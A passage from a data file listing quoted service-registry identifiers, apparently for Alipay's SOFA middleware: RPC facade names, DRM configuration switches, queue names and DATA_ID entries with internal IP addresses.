176.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.wmonitor.facade.WorkOrderSchedulerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_machineRecycleFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fundprod.common.service.facade.product.drm.FundProdConvertDrmConfig.convertProdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:iotbsp.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assay.common.facade.RuleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alcontract.common.service.facade.ContractOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.dal.ConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.icbcEforceQueryBankIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstOutMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.ParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.LoginInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.rest.RefundManageSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.uemprod.common.service.facade.function.FunctionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.capacity.ActivityPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryAccBillService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.biz.shared.common.interfaces.CustMaterialManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CARDBIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.hyp.SyncServInfoForHYPFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.bkbcs.common.service.facade.sign.api.BcsSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.tmallpcard.api.TmallPCardtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.migrate.MigrateAcquireMangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","finpromoscene@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.15.246.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_TEST_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cstraining.common.service.facade.training.api.NewCstTrainingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.video.OrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.TbcinemaCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:huabeiTestApplyApproval_CallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.query.PcreditConfirmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.op.MemberWhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibops.common.service.facade.query.UserPaymentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.PromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.AmlDataPunishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppPreInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.apply.LendDemandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.24.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.galaxy.XMktActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.247.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_bkcreditcoreHold@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:vehownerprod_autoAccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.task.GrowthProjectRpcTrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zmyschecker.common.service.facade.unified.UnifiedPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.namelist.BizNameListAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alipayse.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:bkPromoGuardOpsChngAsyncRisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaAddNodesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tallycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.product.PushPurhcaseProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.system.SystemInfoQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkopermng_approveAuditProcessCallBackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.trade.DeviceTradeSignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:etenSdp_ProcessCallBackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.4.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.prototype2.ActivityInfoQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.69.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.starWishCountBySubjectIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.service.facade.ldc.AlipassLDCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.qc.QcResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pointmng.generalpointOracleDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.content.service.facade.EmergencyMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-valid-condition-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:dchainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_GRDC_GLOBAL_SYNC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyStatisticFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.TaskWarningFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revtrans.common.service.facade.api.AccountLogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.kb.EleAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundTradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventSubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.ProductParaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsPolicyAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zcache.log.riskmng.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopKeyPersonInfoValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.selfZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:cashier@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaSLMTaskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.common.prod.prodquery.PcreditPlanProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.playback.appdata.OeEmulatorPlaybackAppDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.clientGrayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.pcard.VcpCardManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.prodquery.PQDRMConfig.isLogDalSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.105.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.40.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.prepaidcard.api.PctransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.gateway.AsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.loan.api.FinancingElementValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zscript.DRMResource.zscriptParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emcooperate.common.service.facade.JbBroadcastServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.parser.ContentParserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.phytable.TableInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zplayback.playback.service.RecordDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.MerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:launchReviewTaskSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@multimediabase#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.securitydata.common.service.facade.indicator.IndicatorProtocolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccPayProdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinflux.common.service.facade.ChannelRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.FuseWaringRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antgroup.antchain.myentcore.common.service.facade.api.ShareCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.CommonCmdDrm.specialCmdVerIpList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartsql.service.facade.blink.controller.BlinkDryRunController#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.common.service.facade.FundContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.JarEnvService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.transaction.EncashTransListQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.192.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodtrans.senior.manage.facade.ProdBlackManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ArrangementDataVOQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.ProductUpgradeBaseInfoIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.243.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finopenscene.facade.discuss.TabConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundLiquidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmSyncDomainServiceExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZDRMDATA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.wealthFiccTradeQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcube.common.service.facade.page.ProductUpgradeTaskIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.common.service.facade.CreateTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopDuplicateJudgeWaitingExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_mock#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.ceres.CeresContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkassetmore.common.service.facade.api.LiquidPlnServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.workflow.common.service.facade.api.tsd.TestAbilityExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_OPEN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.null:name=com.alipay.fraudmng.core.service.riskcontrol.resource.BatchOperateConfigResource.batchRuleEditSwitchAsynNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.facade.api.slip.SlipApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.front.authorization.ack.remote.IRemoteAckVerifyProcessor:1.0:remoteAgreementAuthVerifyProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.fabs.api.trans.FinanceAssetTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.nozone.NoZoneRouteRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.info.InstinfoServiceStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PaymentStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.analyze.biz.manager.lifecycle.StrategyPublishHistoryManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.facade.tradeplus.TradeplusCheckConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.OrganizationFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.recommendplatform.client.TripleRecommend:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:amldata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.auth.AuthAssistantFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:dcepweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.assettrans.facade.faasset.api.FaAssetViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zeldatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.client.FinfoTransClientConfig:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.opevent.OpEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.manage.api.InstAbilityCfgManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_PARKING_CAPITAL_CHANGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfpcenter:name=com.alipay.cfpcenter.core.service.drm.AppContextDrmResource.cancelDataId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.GeocodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.app:name=com.alipay.fc.pdcore.core.service.adapter.drm.ProductSaleConfigDrm.offlineProductSaleQueryMaxTransDateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ABCDEFG:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.bizfundprod.common.service.facade.transfer.FundTransferRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.afsc.common.service.blackbox.BbService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.mng.InterfaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedContract2NewSyncDrmImpl.batchInsertSyncTableString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.GroupFundRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.api.UserCurrencyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.opsware.rest.BuildpackSofaRestServices:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.v3.ProductQueryV3Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.area.ParaProvinceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.merchantmember.facade.MerchantBenifitCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.facade.FinfoServiceAppApplyInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.service.MiniappControlFacade:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.ComplainMobileRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.CucdpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:updateDataflowCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.test.SimpleService-38#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotationcore.common.service.facade.api.indicator.FqpQcIndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityValidatePolicyService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdtrans.common.service.facade.contract.ContractTemplateTransTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.facade.admin.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.revcore.resV